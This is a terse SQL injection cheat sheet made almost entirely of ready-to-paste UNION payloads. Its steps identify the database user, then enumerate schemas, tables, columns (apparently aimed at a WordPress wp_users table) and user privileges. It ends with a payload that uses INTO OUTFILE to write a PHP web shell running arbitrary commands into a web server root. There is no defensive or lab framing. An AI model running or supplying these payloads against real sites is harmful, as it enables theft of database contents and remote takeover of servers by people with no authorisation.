Identify user and db

' UNION SELECT NULL, user(), database() --

Enumerate database names

' UNION SELECT NULL, NULL, SCHEMA_NAME FROM information_schema.SCHEMATA --

Enumerate tables from a db

' UNION SELECT NULL, NULL , TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='db' --

Enumerate columns from table

' UNION SELECT NULL, NULL ,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='wp_users'--

Enumerate user privs

' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges--

If user has file priv, webshells can be written

' union select '<?php system($_GET[\\'cmd\\']); ?>',2,3,4,5,6 into outfile 'c:/inetpub/wwwroot/shell.php--